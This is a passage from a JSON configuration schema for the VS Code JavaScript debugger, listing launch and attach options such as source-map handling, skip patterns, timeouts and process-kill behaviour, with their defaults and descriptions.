framework](https://github.com/microsoft/vscode-js-debug/issues/492).","type":"array"},"runtimeVersion":{"default":"default","markdownDescription":"Version of `node` runtime to use. Requires `nvm`.","type":"string"},"showAsyncStacks":{"default":true,"description":"Show the async calls that led to the current call stack.","oneOf":[{"type":"boolean"},{"properties":{"onAttach":{"default":32,"type":"number"}},"required":["onAttach"],"type":"object"},{"properties":{"onceBreakpointResolved":{"default":32,"type":"number"}},"required":["onceBreakpointResolved"],"type":"object"}]},"skipFiles":{"default":["${/**"],"description":"An array of file or folder names, or path globs, to skip when debugging. Star patterns and negations are allowed, for example, `[\"**/node_modules/**\", \"!**/node_modules/my-module/**\"]`","type":"array"},"smartStep":{"default":true,"description":"Automatically step through generated code that cannot be mapped back to the original source.","type":"boolean"},"sourceMapPathOverrides":{"default":{"meteor://💻app/*":"${workspaceFolder}/*","webpack:///./~/*":"${workspaceFolder}/node_modules/*","webpack://?:*/*":"${workspaceFolder}/*"},"description":"A set of mappings for rewriting the locations of source files from what the sourcemap says, to their locations on disk.","type":"object"},"sourceMapRenames":{"default":true,"description":"Whether to use the \"names\" mapping in sourcemaps. This requires requesting source content, which can be slow with certain debuggers.","type":"boolean"},"sourceMaps":{"default":true,"description":"Use JavaScript source maps (if they exist).","type":"boolean"},"stopOnEntry":{"default":true,"description":"Automatically stop program after launch.","type":["boolean","string"]},"timeout":{"default":10000,"description":"Retry for this number of milliseconds to connect to Node.js. Default is 10000 ms.","type":"number"},"timeouts":{"additionalProperties":false,"default":{},"description":"Timeouts for several debugger operations.","markdownDescription":"Timeouts for several debugger operations.","properties":{"hoverEvaluation":{"default":500,"description":"Time until value evaluation for hovered symbols is aborted. If set to 0, hover evaluation does never time out.","type":"number"},"sourceMapCumulativePause":{"default":1000,"description":"Extra time in milliseconds allowed per session to be spent waiting for source-maps to be processed, after the minimum time (sourceMapMinPause) has been exhausted","type":"number"},"sourceMapMinPause":{"default":1000,"description":"Minimum time in milliseconds spent waiting for each source-map to be processed when a script is being parsed","type":"number"}},"type":"object"},"trace":{"default":true,"description":"Configures what diagnostic output is produced.","oneOf":[{"description":"Trace may be set to 'true' to write diagnostic logs to the disk.","type":"boolean"},{"additionalProperties":false,"properties":{"logFile":{"description":"Configures where on disk logs are written.","type":["string","null"]},"stdio":{"description":"Whether to return trace data from the launched application or browser.","type":"boolean"}},"type":"object"}]}},"type":"object"},{"additionalProperties":false,"default":{"program":"npm start"},"description":"JavaScript Debug Terminal","properties":{"autoAttachChildProcesses":{"default":true,"description":"Attach debugger to new child processes automatically.","type":"boolean"},"cascadeTerminateToConfigurations":{"default":[],"description":"A list of debug sessions which, when this debug session is terminated, will also be stopped.","items":{"type":"string","uniqueItems":true},"type":"array"},"command":{"default":"npm start","description":"Command to run in the launched terminal. If not provided, the terminal will open without launching a program.","tags":["setup"],"type":["string","null"]},"customDescriptionGenerator":{"description":"Customize the textual description the debugger shows for objects (local variables, etc...). Samples:\n 1. this.toString() // will call toString to print all objects\n 2. this.customDescription ? this.customDescription() : defaultValue // Use customDescription method if available, if not return defaultValue\n 3. function (def) { return this.customDescription ? this.customDescription() : def } // Use customDescription method if available, if not return defaultValue\n ","type":"string"},"customPropertiesGenerator":{"deprecated":true,"description":"Customize the properties shown for an object in the debugger (local variables, etc...). Samples:\n 1. { ...this, extraProperty: '12345' } // Add an extraProperty 12345 to all objects\n 2. this.customProperties ? this.customProperties() : this // Use customProperties method if available, if not use the properties in this (the default properties)\n 3. function () { return this.customProperties ? this.customProperties() : this } // Use customDescription method if available, if not return the default properties\n\n Deprecated: This is a temporary implementation of this feature until we have time to implement it in the way described here: https://github.com/microsoft/vscode/issues/102181","type":"string"},"cwd":{"default":"${workspaceFolder}","description":"Absolute path to the working directory of the program being debugged. If you've set localRoot then cwd will match that value otherwise it falls back to your workspaceFolder","docDefault":"localRoot || ${workspaceFolder}","tags":["setup"],"type":"string"},"enableContentValidation":{"default":true,"description":"Toggles whether we verify the contents of files on disk match the ones loaded in the runtime. This is useful in a variety of scenarios and required in some, but can cause issues if you have server-side transformation of scripts, for example.","type":"boolean"},"enableDWARF":{"default":true,"markdownDescription":"Toggles whether the debugger will try to read DWARF debug symbols from WebAssembly, which can be resource intensive. Requires the `ms-vscode.wasm-dwarf-debugging` extension to function.","type":"boolean"},"env":{"additionalProperties":{"type":["string","null"]},"default":{},"markdownDescription":"Environment variables passed to the program. The value `null` removes the variable from the environment.","tags":["setup"],"type":"object"},"envFile":{"default":"${workspaceFolder}/.env","description":"Absolute path to a file containing environment variable definitions.","type":"string"},"localRoot":{"default":null,"description":"Path to the local directory containing the program.","type":["string","null"]},"nodeVersionHint":{"default":12,"description":"Allows you to explicitly specify the Node version that's running, which can be used to disable or enable certain behaviors in cases where the automatic version detection does not work.","minimum":8,"type":"number"},"outFiles":{"default":["${workspaceFolder}/**/*.(m|c|)js","!**/node_modules/**"],"description":"If source maps are enabled, these glob patterns specify the generated JavaScript files. If a pattern starts with `!` the files are excluded. If not specified, the generated code is expected in the same directory as its source.","items":{"type":"string"},"tags":["setup"],"type":["array"]},"outputCapture":{"default":"console","enum":["console","std"],"markdownDescription":"From where to capture output messages: the default debug API if set to `console`, or stdout/stderr streams if set to `std`."},"pauseForSourceMap":{"default":false,"markdownDescription":"Whether to wait for source maps to load for each incoming script. This has a performance overhead, and might be safely disabled when running off of disk, so long as `rootPath` is not disabled.","type":"boolean"},"remoteRoot":{"default":null,"description":"Absolute path to the remote directory containing the program.","type":["string","null"]},"resolveSourceMapLocations":{"default":["${workspaceFolder}/**","!**/node_modules/**"],"description":"A list of minimatch patterns for locations (folders and URLs) in which source maps can be used to resolve local files. This can be used to avoid incorrectly breaking in external source mapped code. Patterns can be prefixed with \"!\" to exclude them. May be set to an empty array or null to avoid restriction.","items":{"type":"string"},"type":["array","null"]},"runtimeSourcemapPausePatterns":{"default":[],"items":{"type":"string"},"markdownDescription":"A list of patterns at which to manually insert entrypoint breakpoints. This can be useful to give the debugger an opportunity to set breakpoints when using sourcemaps that don't exist or can't be detected before launch, such as [with the Serverless framework](https://github.com/microsoft/vscode-js-debug/issues/492).","type":"array"},"showAsyncStacks":{"default":true,"description":"Show the async calls that led to the current call stack.","oneOf":[{"type":"boolean"},{"properties":{"onAttach":{"default":32,"type":"number"}},"required":["onAttach"],"type":"object"},{"properties":{"onceBreakpointResolved":{"default":32,"type":"number"}},"required":["onceBreakpointResolved"],"type":"object"}]},"skipFiles":{"default":["${/**"],"description":"An array of file or folder names, or path globs, to skip when debugging. Star patterns and negations are allowed, for example, `[\"**/node_modules/**\", \"!**/node_modules/my-module/**\"]`","type":"array"},"smartStep":{"default":true,"description":"Automatically step through generated code that cannot be mapped back to the original source.","type":"boolean"},"sourceMapPathOverrides":{"default":{"meteor://💻app/*":"${workspaceFolder}/*","webpack:///./~/*":"${workspaceFolder}/node_modules/*","webpack://?:*/*":"${workspaceFolder}/*"},"description":"A set of mappings for rewriting the locations of source files from what the sourcemap says, to their locations on disk.","type":"object"},"sourceMapRenames":{"default":true,"description":"Whether to use the \"names\" mapping in sourcemaps. This requires requesting source content, which can be slow with certain debuggers.","type":"boolean"},"sourceMaps":{"default":true,"description":"Use JavaScript source maps (if they exist).","type":"boolean"},"timeout":{"default":10000,"description":"Retry for this number of milliseconds to connect to Node.js. Default is 10000 ms.","type":"number"},"timeouts":{"additionalProperties":false,"default":{},"description":"Timeouts for several debugger operations.","markdownDescription":"Timeouts for several debugger operations.","properties":{"hoverEvaluation":{"default":500,"description":"Time until value evaluation for hovered symbols is aborted. If set to 0, hover evaluation does never time out.","type":"number"},"sourceMapCumulativePause":{"default":1000,"description":"Extra time in milliseconds allowed per session to be spent waiting for source-maps to be processed, after the minimum time (sourceMapMinPause) has been exhausted","type":"number"},"sourceMapMinPause":{"default":1000,"description":"Minimum time in milliseconds spent waiting for each source-map to be processed when a script is being parsed","type":"number"}},"type":"object"},"trace":{"default":true,"description":"Configures what diagnostic output is produced.","oneOf":[{"description":"Trace may be set to 'true' to write diagnostic logs to the disk.","type":"boolean"},{"additionalProperties":false,"properties":{"logFile":{"description":"Configures where on disk logs are written.","type":["string","null"]},"stdio":{"description":"Whether to return trace data from the launched application or browser.","type":"boolean"}},"type":"object"}]}},"type":"object"}]},"showAsyncStacks":{"default":true,"description":"Show the async calls that led to the current call stack.","oneOf":[{"type":"boolean"},{"properties":{"onAttach":{"default":32,"type":"number"}},"required":["onAttach"],"type":"object"},{"properties":{"onceBreakpointResolved":{"default":32,"type":"number"}},"required":["onceBreakpointResolved"],"type":"object"}]},"skipFiles":{"default":["${/**"],"description":"An array of file or folder names, or path globs, to skip when debugging. Star patterns and negations are allowed, for example, `[\"**/node_modules/**\", \"!**/node_modules/my-module/**\"]`","type":"array"},"smartStep":{"default":true,"description":"Automatically step through generated code that cannot be mapped back to the original source.","type":"boolean"},"sourceMapPathOverrides":{"default":{"meteor://💻app/*":"${workspaceFolder}/*","webpack:///./~/*":"${workspaceFolder}/node_modules/*","webpack://?:*/*":"${workspaceFolder}/*"},"description":"A set of mappings for rewriting the locations of source files from what the sourcemap says, to their locations on disk.","type":"object"},"sourceMapRenames":{"default":true,"description":"Whether to use the \"names\" mapping in sourcemaps. This requires requesting source content, which can be slow with certain debuggers.","type":"boolean"},"sourceMaps":{"default":true,"description":"Use JavaScript source maps (if they exist).","type":"boolean"},"targetSelection":{"default":"automatic","enum":["pick","automatic"],"markdownDescription":"Whether to attach to all targets that match the URL filter (\"automatic\") or ask to pick one (\"pick\").","type":"string"},"timeout":{"default":10000,"description":"Retry for this number of milliseconds to connect to Node.js. Default is 10000 ms.","type":"number"},"timeouts":{"additionalProperties":false,"default":{},"description":"Timeouts for several debugger operations.","markdownDescription":"Timeouts for several debugger operations.","properties":{"hoverEvaluation":{"default":500,"description":"Time until value evaluation for hovered symbols is aborted. If set to 0, hover evaluation does never time out.","type":"number"},"sourceMapCumulativePause":{"default":1000,"description":"Extra time in milliseconds allowed per session to be spent waiting for source-maps to be processed, after the minimum time (sourceMapMinPause) has been exhausted","type":"number"},"sourceMapMinPause":{"default":1000,"description":"Minimum time in milliseconds spent waiting for each source-map to be processed when a script is being parsed","type":"number"}},"type":"object"},"trace":{"default":true,"description":"Configures what diagnostic output is produced.","oneOf":[{"description":"Trace may be set to 'true' to write diagnostic logs to the disk.","type":"boolean"},{"additionalProperties":false,"properties":{"logFile":{"description":"Configures where on disk logs are written.","type":["string","null"]},"stdio":{"description":"Whether to return trace data from the launched application or browser.","type":"boolean"}},"type":"object"}]},"url":{"default":"http://localhost:8080","description":"Will search for a tab with this exact url and attach to it, if found","tags":["setup"],"type":"string"},"urlFilter":{"default":"","description":"Will search for a page with this url and attach to it, if found. Can have * wildcards.","type":"string"},"useWebView":{"default":{"pipeName":"MyPipeName"},"description":"An object containing the `pipeName` of a debug pipe for a UWP hosted Webview2. This is the \"MyTestSharedMemory\" when creating the pipe \"\\\\.\\pipe\\LOCAL\\MyTestSharedMemory\"","properties":{"pipeName":{"type":"string"}},"type":"object"},"vueComponentPaths":{"default":["${workspaceFolder}/**/*.vue"],"description":"A list of file glob patterns to find `*.vue` components. By default, searches the entire workspace. This needs to be specified due to extra lookups that Vue's sourcemaps require in Vue CLI 4. You can disable this special handling by setting this to an empty array.","type":"array"},"webRoot":{"default":"${workspaceFolder}","description":"This specifies the workspace absolute path to the webserver root. Used to resolve paths like `/app.js` to files on disk. Shorthand for a pathMapping for \"/\"","tags":["setup"],"type":"string"}}},"launch":{"properties":{"address":{"default":"localhost","description":"When debugging webviews, the IP address or hostname the webview is listening on. Will be automatically discovered if not set.","type":"string"},"browserLaunchLocation":{"default":null,"description":"Forces the browser to be launched in one location. In a remote workspace (through ssh or WSL, for example) this can be used to open the browser on the remote machine rather than locally.","oneOf":[{"type":"null"},{"enum":["ui","workspace"],"type":"string"}]},"cascadeTerminateToConfigurations":{"default":[],"description":"A list of debug sessions which, when this debug session is terminated, will also be stopped.","items":{"type":"string","uniqueItems":true},"type":"array"},"cleanUp":{"default":"wholeBrowser","description":"What clean-up to do after the debugging session finishes. Close only the tab being debug, vs. close the whole browser.","enum":["wholeBrowser","onlyTab"],"type":"string"},"customDescriptionGenerator":{"description":"Customize the textual description the debugger shows for objects (local variables, etc...). Samples:\n 1. this.toString() // will call toString to print all objects\n 2. this.customDescription ? this.customDescription() : defaultValue // Use customDescription method if available, if not return defaultValue\n 3. function (def) { return this.customDescription ? this.customDescription() : def } // Use customDescription method if available, if not return defaultValue\n ","type":"string"},"customPropertiesGenerator":{"deprecated":true,"description":"Customize the properties shown for an object in the debugger (local variables, etc...). Samples:\n 1. { ...this, extraProperty: '12345' } // Add an extraProperty 12345 to all objects\n 2. this.customProperties ? this.customProperties() : this // Use customProperties method if available, if not use the properties in this (the default properties)\n 3. function () { return this.customProperties ? this.customProperties() : this } // Use customDescription method if available, if not return the default properties\n\n Deprecated: This is a temporary implementation of this feature until we have time to implement it in the way described here: https://github.com/microsoft/vscode/issues/102181","type":"string"},"cwd":{"default":null,"description":"Optional working directory for the runtime executable.","type":"string"},"disableNetworkCache":{"default":true,"description":"Controls whether to skip the network cache for each request","type":"boolean"},"enableContentValidation":{"default":true,"description":"Toggles whether we verify the contents of files on disk match the ones loaded in the runtime. This is useful in a variety of scenarios and required in some, but can cause issues if you have server-side transformation of scripts, for example.","type":"boolean"},"enableDWARF":{"default":true,"markdownDescription":"Toggles whether the debugger will try to read DWARF debug symbols from WebAssembly, which can be resource intensive. Requires the `ms-vscode.wasm-dwarf-debugging` extension to function.","type":"boolean"},"env":{"default":{},"description":"Optional dictionary of environment key/value pairs for the browser.","type":"object"},"file":{"default":"${workspaceFolder}/index.html","description":"A local html file to open in the browser","tags":["setup"],"type":"string"},"includeDefaultArgs":{"default":true,"description":"Whether default browser launch arguments (to disable features that may make debugging harder) will be included in the launch.","type":"boolean"},"includeLaunchArgs":{"default":true,"description":"Advanced: whether any default launch/debugging arguments are set on the browser. The debugger will assume the browser will use pipe debugging such as that which is provided with `--remote-debugging-pipe`.","type":"boolean"},"inspectUri":{"default":null,"description":"Format to use to rewrite the inspectUri: It's a template string that interpolates keys in `{curlyBraces}`. Available keys are:\n - `url.*` is the parsed address of the running application. For instance, `{url.port}`, `{url.hostname}`\n - `port` is the debug port that Chrome is listening on.\n - `browserInspectUri` is the inspector URI on the launched browser\n - `browserInspectUriPath` is the path part of the inspector URI on the launched browser (e.g.: \"/devtools/browser/e9ec0098-306e-472a-8133-5e42488929c2\").\n - `wsProtocol` is the hinted websocket protocol. This is set to `wss` if the original URL is `https`, or `ws` otherwise.\n","type":["string","null"]},"killBehavior":{"default":"forceful","enum":["forceful","polite","none"],"markdownDescription":"Configures how browser processes are killed when stopping the session with `cleanUp: wholeBrowser`. Can be:\n\n- forceful (default): forcefully tears down the process tree. Sends SIGKILL on posix, or `taskkill.exe /F` on Windows.\n- polite: gracefully tears down the process tree. It's possible that misbehaving processes continue to run after shutdown in this way. Sends SIGTERM on posix, or `taskkill.exe` with no `/F` (force) flag on Windows.\n- none: no termination will happen.","type":"string"},"outFiles":{"default":["${workspaceFolder}/**/*.(m|c|)js","!**/node_modules/**"],"description":"If source maps are enabled, these glob patterns specify the generated JavaScript files. If a pattern starts with `!` the files are excluded. If not specified, the generated code is expected in the same directory as its source.","items":{"type":"string"},"tags":["setup"],"type":["array"]},"outputCapture":{"default":"console","enum":["console","std"],"markdownDescription":"From where to capture output messages: the default debug API if set to `console`, or stdout/stderr streams if set to `std`."},"pathMapping":{"default":{},"description":"A mapping of URLs/paths to local folders, to resolve scripts in the Browser to scripts on disk","type":"object"},"pauseForSourceMap":{"default":false,"markdownDescription":"Whether to wait for source maps to load for each incoming script. This has a performance overhead, and might be safely disabled when running off of disk, so long as `rootPath` is not disabled.","type":"boolean"},"perScriptSourcemaps":{"default":"auto","description":"Whether scripts are loaded individually with unique sourcemaps containing the basename of the source file. This can be set to optimize sourcemap handling when dealing with lots of small scripts. If set to \"auto\", we'll detect known cases where this is appropriate.","enum":["yes","no","auto"],"type":"string"},"port":{"default":9229,"description":"When debugging webviews, the port the webview debugger is listening on. Will be automatically discovered if not set.","type":"number"},"profileStartup":{"default":true,"description":"If true, will start profiling soon as the process launches","type":"boolean"},"resolveSourceMapLocations":{"default":null,"description":"A list of minimatch patterns for locations (folders and URLs) in which source maps can be used to resolve local files. This can be used to avoid incorrectly breaking in external source mapped code. Patterns can be prefixed with \"!\" to exclude them. May be set to an empty array or null to avoid restriction.","items":{"type":"string"},"type":["array","null"]},"runtimeArgs":{"default":[],"description":"Optional arguments passed to the runtime executable.","items":{"type":"string"},"type":"array"},"runtimeExecutable":{"default":"stable","description":"Either 'canary', 'stable', 'dev', 'custom' or path to the browser executable. Custom means a custom wrapper, custom build or EDGE_PATH environment variable.","type":["string","null"]},"server":{"oneOf":[{"additionalProperties":false,"default":{"program":"node my-server.js"},"description":"Configures a web server to start up. Takes the same configuration as the 'node' launch task.","properties":{"args":{"default":[],"description":"Command line arguments passed to the program.\n\nCan be an array of strings or a single string. When the program is launched in a terminal, setting this property to a single string will result in the arguments not being escaped for the shell.","items":{"type":"string"},"tags":["setup"],"type":["array","string"]},"attachSimplePort":{"default":9229,"description":"If set, attaches to the process via the given port. This is generally no longer necessary for Node.js programs and loses the ability to debug child processes, but can be useful in more esoteric scenarios such as with Deno and Docker launches. If set to 0, a random port will be chosen and --inspect-brk added to the launch arguments automatically.","oneOf":[{"type":"integer"},{"pattern":"^\\${.*}$","type":"string"}]},"autoAttachChildProcesses":{"default":true,"description":"Attach debugger to new child processes automatically.","type":"boolean"},"cascadeTerminateToConfigurations":{"default":[],"description":"A list of debug sessions which, when this debug session is terminated, will also be stopped.","items":{"type":"string","uniqueItems":true},"type":"array"},"console":{"default":"internalConsole","description":"Where to launch the debug target.","enum":["internalConsole","integratedTerminal","externalTerminal"],"enumDescriptions":["VS Code Debug Console (which doesn't support to read input from a program)","VS Code's integrated terminal","External terminal that can be configured via user settings"],"type":"string"},"customDescriptionGenerator":{"description":"Customize the textual description the debugger shows for objects (local variables, etc...). Samples:\n 1. this.toString() // will call toString to print all objects\n 2. this.customDescription ? this.customDescription() : defaultValue // Use customDescription method if available, if not return defaultValue\n 3. function (def) { return this.customDescription ? this.customDescription() : def } // Use customDescription method if available, if not return defaultValue\n ","type":"string"},"customPropertiesGenerator":{"deprecated":true,"description":"Customize the properties shown for an object in the debugger (local variables, etc...). Samples:\n 1. { ...this, extraProperty: '12345' } // Add an extraProperty 12345 to all objects\n 2. this.customProperties ? this.customProperties() : this // Use customProperties method if available, if not use the properties in this (the default properties)\n 3. function () { return this.customProperties ? this.customProperties() : this } // Use customDescription method if available, if not return the default properties\n\n Deprecated: This is a temporary implementation of this feature until we have time to implement it in the way described here: https://github.com/microsoft/vscode/issues/102181","type":"string"},"cwd":{"default":"${workspaceFolder}","description":"Absolute path to the working directory of the program being debugged. If you've set localRoot then cwd will match that value otherwise it falls back to your workspaceFolder","tags":["setup"],"type":"string"},"enableContentValidation":{"default":true,"description":"Toggles whether we verify the contents of files on disk match the ones loaded in the runtime. This is useful in a variety of scenarios and required in some, but can cause issues if you have server-side transformation of scripts, for example.","type":"boolean"},"enableDWARF":{"default":true,"markdownDescription":"Toggles whether the debugger will try to read DWARF debug symbols from WebAssembly, which can be resource intensive. Requires the `ms-vscode.wasm-dwarf-debugging` extension to function.","type":"boolean"},"env":{"additionalProperties":{"type":["string","null"]},"default":{},"markdownDescription":"Environment variables passed to the program. The value `null` removes the variable from the environment.","tags":["setup"],"type":"object"},"envFile":{"default":"${workspaceFolder}/.env","description":"Absolute path to a file containing environment variable definitions.","type":"string"},"experimentalNetworking":{"default":"auto","description":"Enable experimental inspection in Node.js. When set to `auto` this is enabled for versions of Node.js that support it. It can be set to `on` or `off` to enable or disable it explicitly.","enum":["auto","on","off"],"type":"string"},"killBehavior":{"default":"forceful","enum":["forceful","polite","none"],"markdownDescription":"Configures how debug processes are killed when stopping the session. Can be:\n\n- forceful (default): forcefully tears down the process tree. Sends SIGKILL on posix, or `taskkill.exe /F` on Windows.\n- polite: gracefully tears down the process tree. It's possible that misbehaving processes continue to run after shutdown in this way. Sends SIGTERM on posix, or `taskkill.exe` with no `/F` (force) flag on Windows.\n- none: no termination will happen.","type":"string"},"localRoot":{"default":null,"description":"Path to the local directory containing the program.","type":["string","null"]},"nodeVersionHint":{"default":12,"description":"Allows you to explicitly specify the Node version that's running, which can be used to disable or enable certain behaviors in cases where the automatic version detection does not work.","minimum":8,"type":"number"},"outFiles":{"default":["${workspaceFolder}/**/*.(m|c|)js","!**/node_modules/**"],"description":"If source maps are enabled, these glob patterns specify the generated JavaScript files. If a pattern starts with `!` the files are excluded. If not specified, the generated code is expected in the same directory as its source.","items":{"type":"string"},"tags":["setup"],"type":["array"]},"outputCapture":{"default":"console","enum":["console","std"],"markdownDescription":"From where to capture output messages: the default debug API if set to `console`, or stdout/stderr streams if set to `std`."},"pauseForSourceMap":{"default":false,"markdownDescription":"Whether to wait for source maps to load for each incoming script. This has a performance overhead, and might be safely disabled when running off of disk, so long as `rootPath` is not disabled.","type":"boolean"},"profileStartup":{"default":true,"description":"If true, will start profiling as soon as the process launches","type":"boolean"},"program":{"default":"","description":"Absolute path to the program. Generated value is guessed by looking at package.json and opened files. Edit this attribute.","tags":["setup"],"type":"string"},"remoteRoot":{"default":null,"description":"Absolute path to the remote directory containing the program.","type":["string","null"]},"resolveSourceMapLocations":{"default":["${workspaceFolder}/**","!**/node_modules/**"],"description":"A list of minimatch patterns for locations (folders and URLs) in which source maps can be used to resolve local files. This can be used to avoid incorrectly breaking in external source mapped code. Patterns can be prefixed with \"!\" to exclude them. May be set to an empty array or null to avoid restriction.","items":{"type":"string"},"type":["array","null"]},"restart":{"default":true,"description":"Try to reconnect to the program if we lose connection. If set to `true`, we'll try once a second, forever. You can customize the interval and maximum number of attempts by specifying the `delay` and `maxAttempts` in an object instead.","oneOf":[{"type":"boolean"},{"properties":{"delay":{"default":1000,"minimum":0,"type":"number"},"maxAttempts":{"default":10,"minimum":0,"type":"number"}},"type":"object"}]},"runtimeArgs":{"default":[],"description":"Optional arguments passed to the runtime executable.","items":{"type":"string"},"tags":["setup"],"type":"array"},"runtimeExecutable":{"default":"node","markdownDescription":"Runtime to use. Either an absolute path or the name of a runtime available on the PATH. If omitted `node` is assumed.","type":["string","null"]},"runtimeSourcemapPausePatterns":{"default":[],"items":{"type":"string"},"markdownDescription":"A list of patterns at which to manually insert entrypoint breakpoints. This can be useful to give the debugger an opportunity to set breakpoints when using sourcemaps that don't exist or can't be detected before launch, such as [with the Serverless framework](https://github.com/microsoft/vscode-js-debug/issues/492).","type":"array"},"runtimeVersion":{"default":"default","markdownDescription":"Version of `node` runtime to use. Requires `nvm`.","type":"string"},"showAsyncStacks":{"default":true,"description":"Show the async calls that led to the current call stack.","oneOf":[{"type":"boolean"},{"properties":{"onAttach":{"default":32,"type":"number"}},"required":["onAttach"],"type":"object"},{"properties":{"onceBreakpointResolved":{"default":32,"type":"number"}},"required":["onceBreakpointResolved"],"type":"object"}]},"skipFiles":{"default":["${/**"],"description":"An array of file or folder names, or path globs, to skip when debugging. Star patterns and negations are allowed, for example, `[\"**/node_modules/**\", \"!**/node_modules/my-module/**\"]`","type":"array"},"smartStep":{"default":true,"description":"Automatically step through generated code that cannot be mapped back to the original source.","type":"boolean"},"sourceMapPathOverrides":{"default":{"meteor://💻app/*":"${workspaceFolder}/*","webpack:///./~/*":"${workspaceFolder}/node_modules/*","webpack://?:*/*":"${workspaceFolder}/*"},"description":"A set of mappings for rewriting the locations of source files from what the sourcemap says, to their locations on disk.","type":"object"},"sourceMapRenames":{"default":true,"description":"Whether to use the \"names\" mapping in sourcemaps. This requires requesting source content, which can be slow with certain debuggers.","type":"boolean"},"sourceMaps":{"default":true,"description":"Use JavaScript source maps (if they exist).","type":"boolean"},"stopOnEntry":{"default":true,"description":"Automatically stop program after launch.","type":["boolean","string"]},"timeout":{"default":10000,"description":"Retry for this number of milliseconds to connect to Node.js. Default is 10000 ms.","type":"number"},"timeouts":{"additionalProperties":false,"default":{},"description":"Timeouts for several debugger operations.","markdownDescription":"Timeouts for several debugger operations.","properties":{"hoverEvaluation":{"default":500,"description":"Time until value evaluation for hovered symbols is aborted. If set to 0, hover evaluation does never time out.","type":"number"},"sourceMapCumulativePause":{"default":1000,"description":"Extra time in milliseconds allowed per session to be spent waiting for source-maps to be processed, after the minimum time (sourceMapMinPause) has been exhausted","type":"number"},"sourceMapMinPause":{"default":1000,"description":"Minimum time in milliseconds spent waiting for each source-map to be processed when a script is being parsed","type":"number"}},"type":"object"},"trace":{"default":true,"description":"Configures what diagnostic output is produced.","oneOf":[{"description":"Trace may be set to 'true' to write diagnostic logs to the disk.","type":"boolean"},{"additionalProperties":false,"properties":{"logFile":{"description":"Configures where on disk logs are written.","type":["string","null"]},"stdio":{"description":"Whether to return trace data from the launched application or browser.","type":"boolean"}},"type":"object"}]}},"type":"object"},{"additionalProperties":false,"default":{"program":"npm start"},"description":"JavaScript Debug Terminal","properties":{"autoAttachChildProcesses":{"default":true,"description":"Attach debugger to new child processes automatically.","type":"boolean"},"cascadeTerminateToConfigurations":{"default":[],"description":"A list of debug sessions which, when this debug session is terminated, will also be stopped.","items":{"type":"string","uniqueItems":true},"type":"array"},"command":{"default":"npm start","description":"Command to run in the launched terminal. If not provided, the terminal will open without launching a program.","tags":["setup"],"type":["string","null"]},"customDescriptionGenerator":{"description":"Customize the textual description the debugger shows for objects (local variables, etc...). Samples:\n 1. this.toString() // will call toString to print all objects\n 2. this.customDescription ? this.customDescription() : defaultValue // Use customDescription method if available, if not return defaultValue\n 3. function (def) { return this.customDescription ? this.customDescription() : def } // Use customDescription method if available, if not return defaultValue\n ","type":"string"},"customPropertiesGenerator":{"deprecated":true,"description":"Customize the properties shown for an object in the debugger (local variables, etc...). Samples:\n 1. { ...this, extraProperty: '12345' } // Add an extraProperty 12345 to all objects\n 2. this.customProperties ? this.customProperties() : this // Use customProperties method if available, if not use the properties in this (the default properties)\n 3. function () { return this.customProperties ? this.customProperties() : this } // Use customDescription method if available, if not return the default properties\n\n Deprecated: This is a temporary implementation of this feature until we have time to implement it in the way described here: https://github.com/microsoft/vscode/issues/102181","type":"string"},"cwd":{"default":"${workspaceFolder}","description":"Absolute path to the working directory of the program being debugged. If you've set localRoot then cwd will match that value otherwise it falls back to your workspaceFolder","docDefault":"localRoot || ${workspaceFolder}","tags":["setup"],"type":"string"},"enableContentValidation":{"default":true,"description":"Toggles whether we verify the contents of files on disk match the ones loaded in the runtime. This is useful in a variety of scenarios and required in some, but can cause issues if you have server-side transformation of scripts, for example.","type":"boolean"},"enableDWARF":{"default":true,"markdownDescription":"Toggles whether the debugger will try to read DWARF debug symbols from WebAssembly, which can be resource intensive. Requires the `ms-vscode.wasm-dwarf-debugging` extension to function.","type":"boolean"},"env":{"additionalProperties":{"type":["string","null"]},"default":{},"markdownDescription":"Environment variables passed to the program. The value `null` removes the variable from the environment.","tags":["setup"],"type":"object"},"envFile":{"default":"${workspaceFolder}/.env","description":"Absolute path to a file containing environment variable definitions.","type":"string"},"localRoot":{"default":null,"description":"Path to the local directory containing the program.","type":["string","null"]},"nodeVersionHint":{"default":12,"description":"Allows you to explicitly specify the Node version that's running, which can be used to disable or enable certain behaviors in cases where the automatic version detection does not work.","minimum":8,"type":"number"},"outFiles":{"default":["${workspaceFolder}/**/*.(m|c|)js","!**/node_modules/**"],"description":"If source maps are enabled, these glob patterns specify the generated JavaScript files. If a pattern starts with `!` the files are excluded. If not specified, the generated code is expected in the same directory as its source.","items":{"type":"string"},"tags":["setup"],"type":["array"]},"outputCapture":{"default":"console","enum":["console","std"],"markdownDescription":"From where to capture output messages: the default debug API if set to `console`, or stdout/stderr streams if set to `std`."},"pauseForSourceMap":{"default":false,"markdownDescription":"Whether to wait for source maps to load for each incoming script. This has a performance overhead, and might be safely disabled when running off of disk, so long as `rootPath` is not disabled.","type":"boolean"},"remoteRoot":{"default":null,"description":"Absolute path to the remote directory containing the program.","type":["string","null"]},"resolveSourceMapLocations":{"default":["${workspaceFolder}/**","!**/node_modules/**"],"description":"A list of minimatch patterns for locations (folders and URLs) in which source maps can be used to resolve local files. This can be used to avoid incorrectly breaking in external source mapped code. Patterns can be prefixed with \"!\" to exclude them. May be set to an empty array or null to avoid restriction.","items":{"type":"string"},"type":["array","null"]},"runtimeSourcemapPausePatterns":{"default":[],"items":{"type":"string"},"markdownDescription":"A list of patterns at which to manually insert entrypoint breakpoints. This can be useful to give the debugger an opportunity to set breakpoints when using sourcemaps that don't exist or can't be detected before launch, such as [with the Serverless framework](https://github.com/microsoft/vscode-js-debug/issues/492).","type":"array"},"showAsyncStacks":{"default":true,"description":"Show the async calls that led to the current call stack.","oneOf":[{"type":"boolean"},{"properties":{"onAttach":{"default":32,"type":"number"}},"required":["onAttach"],"type":"object"},{"properties":{"onceBreakpointResolved":{"default":32,"type":"number"}},"required":["onceBreakpointResolved"],"type":"object"}]},"skipFiles":{"default":["${/**"],"description":"An array of file or folder names, or path globs, to skip when debugging. Star patterns and negations are allowed, for example, `[\"**/node_modules/**\", \"!**/node_modules/my-module/**\"]`","type":"array"},"smartStep":{"default":true,"description":"Automatically step through generated code that cannot be mapped back to the original source.","type":"boolean"},"sourceMapPathOverrides":{"default":{"meteor://💻app/*":"${workspaceFolder}/*","webpack:///./~/*":"${workspaceFolder}/node_modules/*","webpack://?:*/*":"${workspaceFolder}/*"},"description":"A set of mappings for rewriting the locations of source files from what the sourcemap says, to their locations on disk.","type":"object"},"sourceMapRenames":{"default":true,"description":"Whether to use the \"names\" mapping in sourcemaps. This requires requesting source content, which can be slow with certain 